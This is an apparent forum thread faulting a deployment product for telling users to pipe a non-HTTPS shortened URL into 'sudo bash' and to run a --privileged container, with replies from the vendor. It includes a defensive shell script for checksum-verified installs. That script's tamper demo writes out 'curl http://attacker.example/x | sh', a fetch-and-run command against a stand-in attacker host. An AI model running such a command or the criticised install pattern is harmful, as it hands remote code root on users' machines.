by lclarkmichalek 4085 days ago
Did I really just see a screenshot telling the user to, on their server, pipe the contents of a non-HTTPS, goo.gl URL into a sudo bash?

http://lastbackend.com/images/landing/timeline/deploy_2.png


And in the docs[0], the manual instructions ask you to run their agent container with --privileged=true, which gives the container access to all devices on the host and more.[1]

Looks super neat but I'll pass.

[0] http://lastbackend.com/guide/
[1] https://docs.docker.com/reference/run/
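The safe counterpart of the install step in that screenshot, as an added example that is not lastbackend's code: fetch the installer to disk over HTTPS only (refusing a shortener redirect to plain http), compare it against a SHA-256 pinned out of band, read it, and only then run it as root. The vendor URL, digest and the stand-in installer script are constructed for the demo; only the offline check is exercised.

```shell
#!/bin/sh
# Added example, not lastbackend's installer: the safe counterpart of piping a
# non-HTTPS goo.gl URL into `sudo bash`.
set -eu

# Portable SHA-256 of a file: GNU coreutils sha256sum or BSD/macOS shasum.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# verify_installer FILE EXPECTED_SHA256
# Succeeds only when FILE's digest equals the pinned one; reports both otherwise.
verify_installer() {
    file=$1
    expected=$2
    actual=$(sha256_of "$file")
    if [ "$actual" != "$expected" ]; then
        echo "checksum mismatch for $file" >&2
        echo "  expected: $expected" >&2
        echo "  actual:   $actual" >&2
        return 1
    fi
    return 0
}

# install_from_url URL EXPECTED_SHA256
# The pattern a vendor should document instead of `curl URL | sudo bash`.
# URL and digest are hypothetical; the demo below never reaches curl or sudo.
install_from_url() {
    url=$1
    expected=$2
    case $url in
        https://*) ;;
        *) echo "refusing non-HTTPS URL: $url" >&2; return 1 ;;
    esac
    tmp=$(mktemp)
    # --proto '=https' also refuses a redirect (e.g. from a URL shortener) to plain http.
    curl --proto '=https' --tlsv1.2 -fsSL -o "$tmp" "$url"
    verify_installer "$tmp" "$expected"
    # Read "$tmp" here before granting it root; then:
    sudo sh "$tmp"
    rm -f "$tmp"
}

# Constructed stand-in for a vendor installer, so the check can run offline.
make_constructed_installer() {
    f=$(mktemp)
    printf '#!/bin/sh\necho "installing agent"\n' > "$f"
    echo "$f"
}

# Returns 0 when the untouched file passes and a tampered copy (one appended
# line, as an on-path attacker could add over plain HTTP) is rejected.
demo_detects_tampering() {
    f=$(make_constructed_installer)
    pinned=$(sha256_of "$f")
    verify_installer "$f" "$pinned" || { rm -f "$f"; return 1; }
    printf 'curl http://attacker.example/x | sh\n' >> "$f"
    if verify_installer "$f" "$pinned" 2>/dev/null; then
        rm -f "$f"
        return 1
    fi
    rm -f "$f"
    return 0
}
```

The pinned digest has to come from somewhere other than the page serving the script (a signed release note, a package repository, the vendor's own docs over HTTPS); a checksum published next to the file over the same plain-HTTP channel can be rewritten by the same attacker.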

Hm.. try to start it without --privileged. I think it's not necessary now. I don't remember the main reason why we use that flag. Please try without it and send me feedback. If it works well, we'll update the installer. Thank you!
> I don't remember the main reason why we use that flag.

Troubling.

Having access to the docker socket which runs as root seems equivalent.
Exactly! I asked our developer team and they gave me this reason.
Yeah... sorry for that.. We will fix it on Monday, also HTTPS. It's not good, but we tried to open the product faster!
Security should not be an afterthought. Especially not when you're trying to get me to trust my data to your platform.
You are right. But you can play with our platform this weekend, and next week we'll be opening the agent as open source and enabling security. We have some delay with SSL delivery. :(
When I see security as a second-class citizen on user-visible elements, I assume that the same philosophy was applied on the parts I can't audit, even after the front-end stuff was fixed.
Just get a free cert from StartSSL while you wait for your other cert to go through. It's better than nothing.

Asking people on HN to send their passwords in the clear is suicide.

I, for one, ain't playin' with anything you build. You ain't coming close to having sudo on any of my machines if I can help it.

This shit with "enable security" as after-thought has to stop.

I agree. It basically makes me distrust the whole thing inside and out; who knows what other bs engineering practices were used in non-visible parts of the stack? Shipping is great, but please don't ship insecure stuff as a product you want customers to use. Please.
We have enabled HTTPS. Thanks for your comments.

Next: installer update. Give us a few minutes.

That attitude might work for a social network for cats, but it's not going to fly if you're asking users to trust you with their production servers.
You can get HTTPS for free (and hassle-free) if you use Cloudflare as your DNS server. Disclaimer: I am doing this publicity as a happy customer, without earning anything in return.
It's a bit more than DNS. It's sending all of your traffic through cloudflare, and they cache content/act as a CDN. But they can theoretically inspect/modify all traffic.
Fair enough. Regardless, congrats on the release.